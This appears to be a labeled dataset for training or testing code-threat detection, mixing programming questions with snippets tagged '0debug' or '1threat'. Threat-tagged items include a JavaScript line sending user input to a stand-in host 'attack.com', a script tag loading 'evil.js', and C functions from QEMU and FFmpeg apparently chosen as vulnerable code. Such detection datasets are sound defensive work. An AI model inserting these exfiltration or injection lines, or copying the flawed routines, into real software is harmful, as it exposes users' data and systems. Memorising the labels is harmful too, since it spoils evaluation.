<CodeSnippets xmlns="http://schemas.microsoft.com/VisualStudio/2005/CodeSnippet">
<CodeSnippet Format="1.0.0">
<Header>
<Title>prod1</Title>
<Description>testing</Description>
<Author> dale </Author>
<SnippetTypes>
<SnippetType>Expansion</SnippetType>
</SnippetTypes>
<Shortcut>crproc</Shortcut>
</Header>
<Snippet>
<Declarations>
<Literal>
<ID>DatabaseName</ID>
<ToolTip>Name of database.</ToolTip>
<Default>DB</Default>
</Literal>
</Declarations>
<Code Language="SQL">
<![CDATA[
------------------------------------------------------
-- FILENAME: Template-Expansion.snippet
-- PURPOSE: Template for Expansion (Insert) snippets.
-- AUTHOR: Ken O. Bonn
-- DATE: May 15, 2013
------------------------------------------------------
SET NOCOUNT ON;
EXEC SP_HELPDB $DatabaseName$;
]]>
</Code>
</Snippet>
</CodeSnippet>
</CodeSnippets>
</code></pre>
| 0debug
|
Installation of Minishlink/web-push : I am unable to install this library from GitHub. [ Minishlink/web-push ]<br><br>
I have Laravel 5 installed on my server, and I want to install this in the Laravel directory (project). I will use the library via custom PHP.<br><br>
I am facing the issues below:
1. when i run `composer require minishlink/web-push`, i get below eror[![enter image description here][1]][1]
2. when i run `composer require mdanter/eec`, i get below error[![enter image description here][2]][2]
3. when i run `composer require pargonie/rndom_compat`, i get below error[![enter image description here][3]][3]
[1]: http://i.stack.imgur.com/5ClD3.jpg
[2]: http://i.stack.imgur.com/YukqG.jpg
[3]: http://i.stack.imgur.com/nWvRq.jpg
| 0debug
|
iOS 11 search bar jumping to top of screen : <p>I've got a UITableView in which I set its header to be a search bar.</p>
<pre><code>tableView.tableHeaderView = searchController.searchBar
</code></pre>
<p>Everything works according to plan until you click it and it seemingly detaches from the tableView and jumps to the top of the screen. The tableView rows stay in place. Any reason it would do that in iOS 11 and not iOS 10?</p>
| 0debug
|
How to open 2 Visual Studio instances, with the same Git project and different branches : <p>I need to open 2 Visual Studio instances: one will be open just so I can look at the code of Project X / Branch 1.
The other will be used to code in Project X / Branch 2.
How can I do that without losing changes when committing? </p>
| 0debug
|
How to get values from a JSON response? : This is my JSON response. I want to show the value at the 3rd index of every array in a ListView...
"history":[["2","mega@gmail.com","21.2299924","72.8247365","1479718230719"],["3","mega@gmail.com","21.2299926","72.8247346","1479718265453"],["4","mega@gmail.com","21.2299924","72.8247345","1479719800472"],["5","mega@gmail.com","21.2299927","72.8247354","1479720302919"],["6","mega@gmail.com","21.2299926","72.8247344","1479720880373"],["7","mega@gmail.com","21.2299926","72.8247343","1479721139992"]]}
| 0debug
|
How to create a Google Map image mask overlay? : <p>I'm trying to create a Google Map "inside" a shape like in the example below.
Could you please help me?
<a href="https://i.stack.imgur.com/qsGHC.png" rel="nofollow noreferrer">Click to see Image</a></p>
| 0debug
|
document.write('<script src="evil.js"></script>');
| 1threat
|
Rails Global Function: Pass Object Function Is Called On : <p>I want to create a global function, which I will put in my application controller.</p>
<p>For the sake of making this question simple, here is an example of what I would do:</p>
<p>In my <code>/application_controller.rb</code></p>
<pre><code>def self.global_function(device)
p device
end
</code></pre>
<p>And in the controller I'm working in:</p>
<pre><code>def some_function
global_function(Device.find(some_id))
end
</code></pre>
<p>That works, but I would like to have it work, for example, as the <code>.last</code> method does. The end result would allow me to call like this instead:</p>
<pre><code>def some_function
Device.find(some_id).global_function
end
</code></pre>
<p>Still passing the device object over, but without the need for parameters.</p>
<p>I can't give a reason for why I prefer one over the other, aside from aesthetics. If there are any drawbacks from using one way over the other, I'd like to know that as well. Thanks</p>
| 0debug
|
IndentationError: expected an indented block when trying to reproduce LDA for a document : <p>I am trying to obtain the LDA distribution among the first article of my collection but I am running into several errors:</p>
<p>my collection: <code>doc_set</code>, is a <code>pandas.core.series.Series</code>. Whenever I wanted to run the simple code:</p>
<pre><code>print(ldamodel[doc_set[1]])
</code></pre>
<p>I run the following error: <code>ValueError: The truth value of a Series is ambiguous. Use a.empty, a.bool(), a.item(), a.any() or a.all().</code> Which I think I solved it by:</p>
<pre><code>if doc_set is not None:
print(ldamodel[doc_set[1]])
</code></pre>
<p>Nevertheless, now I get the following error: <code>IndentationError: expected an indented block</code>. I am looking for the intuition behind the error rather than the correction; I cannot post my whole LDA code for reproduction because it is too massive. Thanks in advance!</p>
| 0debug
|
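For the IndentationError entry above, the intuition is that Python delimits the body of an if statement (or any compound statement) purely by indentation, so the line after the colon must be indented one level. A minimal sketch follows; the single-element list stands in for the pandas Series from the question, and the earlier ValueError about a Series' truth value is a separate issue not addressed here.

```python
doc_set = ["some document"]  # stand-in for the pandas Series in the question

# Raises IndentationError: the body of the if-statement is not indented.
# if doc_set is not None:
# print(doc_set[0])

# Works: the body is indented one level under the colon.
if doc_set is not None:
    print(doc_set[0])
```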
What is the difference between String and StringBuilder in this code? : <p>I would like to know why the output of this code is "roar roar!!!" and not "roar!!! roar!!!"?
the code is:</p>
<pre><code> public class Lion
{
public void roar(String roar1, StringBuilder roar2) {
roar1.concat("!!!");
roar2.append("!!!");
}
public static void main(String[] args)
{
String roar1 = "roar";
StringBuilder roar2 = new StringBuilder("roar");
new Lion().roar(roar1, roar2);
System.out.println(roar1 + " " + roar2);
} }
</code></pre>
<p>I am trying to find the reason why the concat() method does not append one String to the end of the other. Please explain. </p>
| 0debug
|
target_phys_addr_t memory_region_section_get_iotlb(CPUArchState *env,
MemoryRegionSection *section,
target_ulong vaddr,
target_phys_addr_t paddr,
int prot,
target_ulong *address)
{
target_phys_addr_t iotlb;
CPUWatchpoint *wp;
if (memory_region_is_ram(section->mr)) {
iotlb = (memory_region_get_ram_addr(section->mr) & TARGET_PAGE_MASK)
+ memory_region_section_addr(section, paddr);
if (!section->readonly) {
iotlb |= phys_section_notdirty;
} else {
iotlb |= phys_section_rom;
}
} else {
iotlb = section - phys_sections;
iotlb += memory_region_section_addr(section, paddr);
}
QTAILQ_FOREACH(wp, &env->watchpoints, entry) {
if (vaddr == (wp->vaddr & TARGET_PAGE_MASK)) {
if ((prot & PAGE_WRITE) || (wp->flags & BP_MEM_READ)) {
iotlb = phys_section_watch + paddr;
*address |= TLB_MMIO;
break;
}
}
}
return iotlb;
}
| 1threat
|
window.location.href = 'http://attack.com?user=' + user_input;
| 1threat
|
What view/layout would work best for this Android fragment? : <p>I am trying to create a view like this in an Android fragment, and after doing a good amount of research, I am still unsure what the best way to go about doing this <strong><em>in a fragment</em></strong>.</p>
<p>It appears to possibly need 2 different layouts, but I could also be very incorrect. I am new to Android and appreciate any help I can get. </p>
<p><a href="https://i.stack.imgur.com/DH4pK.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/DH4pK.png" alt="Attempted fragment layout"></a></p>
<p>Thank you!</p>
| 0debug
|
char *qemu_find_file(int type, const char *name)
{
int len;
const char *subdir;
char *buf;
if (access(name, R_OK) == 0) {
return g_strdup(name);
}
switch (type) {
case QEMU_FILE_TYPE_BIOS:
subdir = "";
break;
case QEMU_FILE_TYPE_KEYMAP:
subdir = "keymaps/";
break;
default:
abort();
}
len = strlen(data_dir) + strlen(name) + strlen(subdir) + 2;
buf = g_malloc0(len);
snprintf(buf, len, "%s/%s%s", data_dir, subdir, name);
if (access(buf, R_OK)) {
g_free(buf);
return NULL;
}
return buf;
}
| 1threat
|
bad_alloc in std::vector constructor : <p><code>std::vector</code> has a constructor where passing a single argument of <code>size_type count</code> should size the vector with <code>count</code> default-constructed elements. But the following code fails with a <code>bad_alloc</code> exception after a bad conversion:</p>
<pre><code>#include <vector>
struct Inner {
int foo;
char buf[256];
};
template <typename Type>
struct Outer
{
typedef std::vector<Inner> BufContainer;
typedef typename BufContainer::size_type BufIndex;
BufContainer bufs1;
BufContainer bufs2;
const BufIndex BUFCOUNT = 32;
Outer() :
bufs1(32), // fine
bufs2(BUFCOUNT) // bad_alloc
{ }
};
int main() {
Outer<int> outer;
}
</code></pre>
<p>When I look in the debugger, I can see an incorrect conversion has occurred on that second vector constructor:</p>
<pre><code>#13 0x0000000000400bf1 in Outer<int>::Outer (this=0x7ffdc59570c0) at wtf.cc:22
22 bufs2(BUFCOUNT)
(gdb) down
#12 0x0000000000400d6e in std::vector<Inner, std::allocator<Inner> >::vector (this=0x7ffdc59570d8, __n=140727918359008, __a=...) at /usr/local/gcc-4.9.1/include/c++/4.9.1/bits/stl_vector.h:278
278 : _Base(__n, __a)
(gdb) list
273 * This constructor fills the %vector with @a __n default
274 * constructed elements.
275 */
276 explicit
277 vector(size_type __n, const allocator_type& __a = allocator_type())
278 : _Base(__n, __a)
279 { _M_default_initialize(__n); }
(gdb) print __n
$1 = 140727918359008
</code></pre>
<p><code>std::vector::size_type</code> is simply a typedef from <code>size_t</code>. I don't understand why my defined constant <code>BUFCOUNT</code> results in that rolled-around value inside the constructor, and would appreciate anyone helping me find the obvious thing I'm missing.</p>
| 0debug
|
How to print % as a character in printf : <p>I would like to use % as a normal character in printf. Let's say the output is "a is 20% higher than b". How would I be able to do that, since % is used as a special character?</p>
| 0debug
|
Am I being Hacked? GalliumOS + Chromium : <p>I am using GalliumOS (Ubuntu 16.04 derivative) and Chromium Browser.</p>
<p>In the last week I have been informed by two major websites, Amazon and Coinbase, that the computer I have been using for the last two years is a "new device" and must be confirmed.</p>
<p>In both instances reconfirming the device via email solved the problem and I kind of forgot about it.</p>
<p>Then just now, whilst using Coinbase I was logged out because of an auth token error. I then had to log back in. 2 stage auth token is working fine.</p>
<p>Is someone trying to hack me or perhaps one of the two above mentioned sites? (I am sure someone somewhere is trying to hack them both ALL THE TIME... is someone getting close????)</p>
| 0debug
|
static int pix_norm1_c(uint8_t * pix, int line_size)
{
int s, i, j;
uint32_t *sq = ff_squareTbl + 256;
s = 0;
for (i = 0; i < 16; i++) {
for (j = 0; j < 16; j += 8) {
#if 0
s += sq[pix[0]];
s += sq[pix[1]];
s += sq[pix[2]];
s += sq[pix[3]];
s += sq[pix[4]];
s += sq[pix[5]];
s += sq[pix[6]];
s += sq[pix[7]];
#else
#if LONG_MAX > 2147483647
register uint64_t x=*(uint64_t*)pix;
s += sq[x&0xff];
s += sq[(x>>8)&0xff];
s += sq[(x>>16)&0xff];
s += sq[(x>>24)&0xff];
s += sq[(x>>32)&0xff];
s += sq[(x>>40)&0xff];
s += sq[(x>>48)&0xff];
s += sq[(x>>56)&0xff];
#else
register uint32_t x=*(uint32_t*)pix;
s += sq[x&0xff];
s += sq[(x>>8)&0xff];
s += sq[(x>>16)&0xff];
s += sq[(x>>24)&0xff];
x=*(uint32_t*)(pix+4);
s += sq[x&0xff];
s += sq[(x>>8)&0xff];
s += sq[(x>>16)&0xff];
s += sq[(x>>24)&0xff];
#endif
#endif
pix += 8;
}
pix += line_size - 16;
}
return s;
}
| 1threat
|
How to save a value in SharedPreferences : I know this question has been asked many times, but I don't understand how to set it up because I am new to Android.
I have tried this:
[1. saved prefrence][1]
[2. also use this][2]
[1]: http://stackoverflow.com/questions/2709253/converting-a-string-to-an-integer-on-android
[2]: http://stackoverflow.com/questions/5068115/spinner-selection-save-to-sharedpreferences-then-retrieve
**Here is my Code**
list = new ArrayList<String>();
list.add("Male");
list.add("Female");
ArrayAdapter<String> dataAdapter = new ArrayAdapter<String>(getActivity(),
android.R.layout.simple_spinner_item, list);
dataAdapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item);
// int selectedPosition = gender.getSelectedItemPosition();
gender.setSelection(sharedpreferences.getInt("Gender1", -1));
list.indexOf(sharedpreferences.getString(Gender1, "Gender1"));
gender.setAdapter(dataAdapter);
**Please help me**
I want to store this value when the user saves their account details.
**Thank you in Advance**
| 0debug
|
Java EE installation for NetBeans and Eclipse : <p>I installed NetBeans with Java EE, but I want to use this Java EE version with Eclipse instead of installing another version just for Eclipse.</p>
| 0debug
|
static inline void RENAME(rgb24tobgr15)(const uint8_t *src, uint8_t *dst, unsigned src_size)
{
const uint8_t *s = src;
const uint8_t *end;
#ifdef HAVE_MMX
const uint8_t *mm_end;
#endif
uint16_t *d = (uint16_t *)dst;
end = s + src_size;
#ifdef HAVE_MMX
__asm __volatile(PREFETCH" %0"::"m"(*src):"memory");
__asm __volatile(
"movq %0, %%mm7\n\t"
"movq %1, %%mm6\n\t"
::"m"(red_15mask),"m"(green_15mask));
mm_end = end - 15;
while(s < mm_end)
{
__asm __volatile(
PREFETCH" 32%1\n\t"
"movd %1, %%mm0\n\t"
"movd 3%1, %%mm3\n\t"
"punpckldq 6%1, %%mm0\n\t"
"punpckldq 9%1, %%mm3\n\t"
"movq %%mm0, %%mm1\n\t"
"movq %%mm0, %%mm2\n\t"
"movq %%mm3, %%mm4\n\t"
"movq %%mm3, %%mm5\n\t"
"psllq $7, %%mm0\n\t"
"psllq $7, %%mm3\n\t"
"pand %%mm7, %%mm0\n\t"
"pand %%mm7, %%mm3\n\t"
"psrlq $6, %%mm1\n\t"
"psrlq $6, %%mm4\n\t"
"pand %%mm6, %%mm1\n\t"
"pand %%mm6, %%mm4\n\t"
"psrlq $19, %%mm2\n\t"
"psrlq $19, %%mm5\n\t"
"pand %2, %%mm2\n\t"
"pand %2, %%mm5\n\t"
"por %%mm1, %%mm0\n\t"
"por %%mm4, %%mm3\n\t"
"por %%mm2, %%mm0\n\t"
"por %%mm5, %%mm3\n\t"
"psllq $16, %%mm3\n\t"
"por %%mm3, %%mm0\n\t"
MOVNTQ" %%mm0, %0\n\t"
:"=m"(*d):"m"(*s),"m"(blue_15mask):"memory");
d += 4;
s += 12;
}
__asm __volatile(SFENCE:::"memory");
__asm __volatile(EMMS:::"memory");
#endif
while(s < end)
{
const int r= *s++;
const int g= *s++;
const int b= *s++;
*d++ = (b>>3) | ((g&0xF8)<<2) | ((r&0xF8)<<7);
}
}
| 1threat
|
Calling an Angular controller/function from JavaScript : <p>I am really new to Angular. I am trying to execute code defined in a controller in my app.js file. I need to do that from plain JavaScript.
How to do that? </p>
<p>app.js file</p>
<p><div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false">
<div class="snippet-code">
<pre class="snippet-code-js lang-js prettyprint-override"><code>app.controller('MyLocCtrl',function($firebaseObject){
myfunction = function () {
const rootRef = firebase.database().ref();
this.object = $firebaseObject(rootRef);
var myLatLng = {lat: -25.363, lng: 131.044};
var map = new google.maps.Map(document.getElementById('map'),{
zoom: 4,
center: myLatLng
});
var marker = new google.maps.Marker({
position: myLatLng,
map: map,
title: 'Hello World!'
});
};
}
);</code></pre>
</div>
</div>
</p>
<p>and my JS code in another page//map.html</p>
<p><div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false">
<div class="snippet-code">
<pre class="snippet-code-js lang-js prettyprint-override"><code> <script src="app.js"></script>
<body ng-app="app">
<div id="map" ng-app='app' ng-controller="MyLocCtrl"></div>
</body>
<script async defer
src="https://maps.googleapis.com/maps/api/js?key=AIzaSyDUX6F83LCTZ7_uQlXzR6_Q2u6BXFIvGkY&callback=angular.element(document.getElementById('map')).firebaseObject().myfunction();">
</script>
</html></code></pre>
</div>
</div>
</p>
| 0debug
|
Print the number of subarrays in an array having negative sum : <pre><code>import java.io.*;
import java.util.*;
public class Solution {
public static void main(String[] args) {
Scanner scan=new Scanner(System.in);
int n=scan.nextInt(); //taking input number of elements in the array
int[] a=new int[n];
for(int i=0;i<n;i++){
a[i]=scan.nextInt(); //taking input elements of the array
}
int count=0;
//start point
for(int i=0;i<n;i++){
//end point
for(int j=i;j<n;j++){
for(int k=i;k<=j;k++){
int sum=0;
sum+=a[k]; //calculating the sum of subarray
if(sum<0)
count++;
}
}
}
System.out.println(count); //printing the no of negative sums
}
}
</code></pre>
<p>Here there are three nested loops: the first loop defines the starting position, the second loop defines the ending position, and the third loop iterates over the elements of the subarray and calculates their sum; if the sum is less than zero, the count is incremented. But with this code I am getting the wrong answer.</p>
| 0debug
|
Java: Sort an ArrayList inside an ArrayList : <p>I'm having some issues sorting an ArrayList that contains ArrayLists.</p>
<pre><code>ArrayList<ArrayList<String>> multiMarkArray = new ArrayList<ArrayList<String>>();
String line;
while ((line = bufRdr.readLine()) != null) {
ArrayList<String> singleMarkArray = new ArrayList<String>();
for (String word : line.split(" ")) {
singleMarkArray.add(word);
}
Collections.swap(singleMarkArray, 0, 1);
multiMarkArray.add(singleMarkArray);
}
Collections.sort(multiMarkArray);
System.out.println(multiMarkArray);
</code></pre>
<p>I'm getting the error <strong>Collections</strong> cannot be applied to (java.util.ArrayList>)</p>
<p>Can someone point me in the right direction to solving this issue?</p>
<p>Thanks</p>
| 0debug
|
React router and this.props.children - how to pass state to this.props.children : <p>I'm using React-router for the first time and I don't know how to think in it yet. Here's how i'm loading my components in nested routes.</p>
<p><strong>entry point .js</strong></p>
<pre><code>ReactDOM.render(
<Router history={hashHistory} >
<Route path="/" component={App}>
<Route path="models" component={Content}>
</Route>
</Router>,
document.getElementById('app')
);
</code></pre>
<p><strong>App.js</strong></p>
<pre><code> render: function() {
return (
<div>
<Header />
{this.props.children}
</div>
);
}
</code></pre>
<p>So the child of my App is the Content component I sent in. I'm using Flux and my App.js has the state and listens for changes, but I don't know how to pass that state down to this.props.children. Before using react-router my App.js defines all children explicitly, so passing state was natural but I don't see how to do it now.</p>
| 0debug
|
static void balloon_stats_poll_cb(void *opaque)
{
VirtIOBalloon *s = opaque;
VirtIODevice *vdev = VIRTIO_DEVICE(s);
if (!balloon_stats_supported(s)) {
balloon_stats_change_timer(s, s->stats_poll_interval);
return;
}
virtqueue_push(s->svq, &s->stats_vq_elem, s->stats_vq_offset);
virtio_notify(vdev, s->svq);
}
| 1threat
|
Is it possible to create an app with only Swift? : <p>I've started to learn Swift, and it is said to be a very fast language that is taking over from Objective-C. But many times I have seen that it is not enough to write only in Swift and that other languages were needed. So I would like to know whether, with only my MacBook, Xcode and Swift, it's possible to create an app like Snapchat, Instagram, WhatsApp or similar.</p>
<p>Thank you.</p>
| 0debug
|
PLSQL Can't Figure Out Left Join : I have 2 tables:
Person with column 'person_id'
Employee with column 'emp_type' = 'full' or 'part'
I need a query that returns everyone in Person but excludes full-time employees. What I'm struggling with is that not all Persons are necessarily in the Employee table.
Can someone help me out? Thanks!
| 0debug
|
Filtering one array from another and pushing uncommon values to a new array using AngularJS : I have a nested array response below:
[[222,444,555,555]]
and another one as below :
[[222,444,555,666,777,333]]
expected new array after filter :
[[666,777,333]]
| 0debug
|
I'm having a problem with this python3 problem : Would someone provide some help on this 'sum of squares' question in Python3? I know that I have to square the values in the range & add them together, but for the life of me, I am not able to figure it out and there are only 3 spaces to fill in. Please help. I have spent entirely too long on this problem.
Thank you very much,
Ken
"""
Fill in the gaps of the sum_squares function, so that it returns the sum of all the squares of numbers between 0 and x (not included). Remember that you can use the range(x) function to generate a sequence of numbers from 0 to x (not included).
"""
# Python3
def square(n):
return n*n
def sum_squares(x):
sum = 0
for n in ___:
sum += __
return __
print(sum_squares(10)) # Should be 285
| 0debug
|
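For the fill-in-the-gaps exercise above, one completion that is consistent with the expected result of 285; this is an assumption about the intended answer, not the course's official solution.

```python
def square(n):
    return n * n

def sum_squares(x):
    sum = 0                 # as in the original skeleton (shadows the built-in sum)
    for n in range(x):      # blank 1: range(x) gives 0 .. x-1
        sum += square(n)    # blank 2: add the square of each n
    return sum              # blank 3: return the accumulated total

print(sum_squares(10))  # Should be 285
```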
static int msrle_decode_8_16_24_32(AVCodecContext *avctx, AVPicture *pic,
int depth, GetByteContext *gb)
{
uint8_t *output, *output_end;
int p1, p2, line=avctx->height - 1, pos=0, i;
uint16_t pix16;
uint32_t pix32;
unsigned int width= FFABS(pic->linesize[0]) / (depth >> 3);
output = pic->data[0] + (avctx->height - 1) * pic->linesize[0];
output_end = pic->data[0] + avctx->height * pic->linesize[0];
while (bytestream2_get_bytes_left(gb) > 0) {
p1 = bytestream2_get_byteu(gb);
if(p1 == 0) {
p2 = bytestream2_get_byte(gb);
if(p2 == 0) {
output = pic->data[0] + (--line) * pic->linesize[0];
if (line < 0) {
if (bytestream2_get_be16(gb) == 1) {
return 0;
} else {
av_log(avctx, AV_LOG_ERROR,
"Next line is beyond picture bounds (%d bytes left)\n",
bytestream2_get_bytes_left(gb));
return AVERROR_INVALIDDATA;
}
}
pos = 0;
continue;
} else if(p2 == 1) {
return 0;
} else if(p2 == 2) {
p1 = bytestream2_get_byte(gb);
p2 = bytestream2_get_byte(gb);
line -= p2;
pos += p1;
if (line < 0 || pos >= width){
av_log(avctx, AV_LOG_ERROR, "Skip beyond picture bounds\n");
return -1;
}
output = pic->data[0] + line * pic->linesize[0] + pos * (depth >> 3);
continue;
}
if ((pic->linesize[0] > 0 && output + p2 * (depth >> 3) > output_end) ||
(pic->linesize[0] < 0 && output + p2 * (depth >> 3) < output_end)) {
bytestream2_skip(gb, 2 * (depth >> 3));
continue;
} else if (bytestream2_get_bytes_left(gb) < p2 * (depth >> 3)) {
av_log(avctx, AV_LOG_ERROR, "bytestream overrun\n");
return AVERROR_INVALIDDATA;
}
if ((depth == 8) || (depth == 24)) {
for(i = 0; i < p2 * (depth >> 3); i++) {
*output++ = bytestream2_get_byteu(gb);
}
if(depth == 8 && (p2 & 1)) {
bytestream2_skip(gb, 1);
}
} else if (depth == 16) {
for(i = 0; i < p2; i++) {
*(uint16_t*)output = bytestream2_get_le16u(gb);
output += 2;
}
} else if (depth == 32) {
for(i = 0; i < p2; i++) {
*(uint32_t*)output = bytestream2_get_le32u(gb);
output += 4;
}
}
pos += p2;
} else {
uint8_t pix[3];
if ((pic->linesize[0] > 0 && output + p1 * (depth >> 3) > output_end) ||
(pic->linesize[0] < 0 && output + p1 * (depth >> 3) < output_end))
continue;
switch(depth){
case 8: pix[0] = bytestream2_get_byte(gb);
break;
case 16: pix16 = bytestream2_get_le16(gb);
break;
case 24: pix[0] = bytestream2_get_byte(gb);
pix[1] = bytestream2_get_byte(gb);
pix[2] = bytestream2_get_byte(gb);
break;
case 32: pix32 = bytestream2_get_le32(gb);
break;
}
switch(depth){
case 8:
for(i = 0; i < p1; i++)
*output++ = pix[0];
break;
case 16:
for(i = 0; i < p1; i++) {
*(uint16_t*)output = pix16;
output += 2;
}
break;
case 24:
for(i = 0; i < p1; i++) {
*output++ = pix[0];
*output++ = pix[1];
*output++ = pix[2];
}
break;
case 32:
for(i = 0; i < p1; i++) {
*(uint32_t*)output = pix32;
output += 4;
}
break;
}
pos += p1;
}
}
av_log(avctx, AV_LOG_WARNING, "MS RLE warning: no end-of-picture code\n");
return 0;
}
| 1threat
|
static ssize_t virtio_net_receive(VLANClientState *nc, const uint8_t *buf, size_t size)
{
VirtIONet *n = DO_UPCAST(NICState, nc, nc)->opaque;
struct virtio_net_hdr_mrg_rxbuf *mhdr = NULL;
size_t hdr_len, offset, i;
if (!virtio_net_can_receive(&n->nic->nc))
return -1;
hdr_len = n->mergeable_rx_bufs ?
sizeof(struct virtio_net_hdr_mrg_rxbuf) : sizeof(struct virtio_net_hdr);
if (!virtio_net_has_buffers(n, size + hdr_len))
return 0;
if (!receive_filter(n, buf, size))
return size;
offset = i = 0;
while (offset < size) {
VirtQueueElement elem;
int len, total;
struct iovec sg[VIRTQUEUE_MAX_SIZE];
total = 0;
if ((i != 0 && !n->mergeable_rx_bufs) ||
virtqueue_pop(n->rx_vq, &elem) == 0) {
if (i == 0)
return -1;
fprintf(stderr, "virtio-net truncating packet: "
"offset %zd, size %zd, hdr_len %zd\n",
offset, size, hdr_len);
exit(1);
}
if (elem.in_num < 1) {
fprintf(stderr, "virtio-net receive queue contains no in buffers\n");
exit(1);
}
if (!n->mergeable_rx_bufs && elem.in_sg[0].iov_len != hdr_len) {
fprintf(stderr, "virtio-net header not in first element\n");
exit(1);
}
memcpy(&sg, &elem.in_sg[0], sizeof(sg[0]) * elem.in_num);
if (i == 0) {
if (n->mergeable_rx_bufs)
mhdr = (struct virtio_net_hdr_mrg_rxbuf *)sg[0].iov_base;
offset += receive_header(n, sg, elem.in_num,
buf + offset, size - offset, hdr_len);
total += hdr_len;
}
len = iov_from_buf(sg, elem.in_num,
buf + offset, size - offset);
total += len;
virtqueue_fill(n->rx_vq, &elem, total, i++);
offset += len;
}
if (mhdr)
mhdr->num_buffers = i;
virtqueue_flush(n->rx_vq, i);
virtio_notify(&n->vdev, n->rx_vq);
return size;
}
| 1threat
|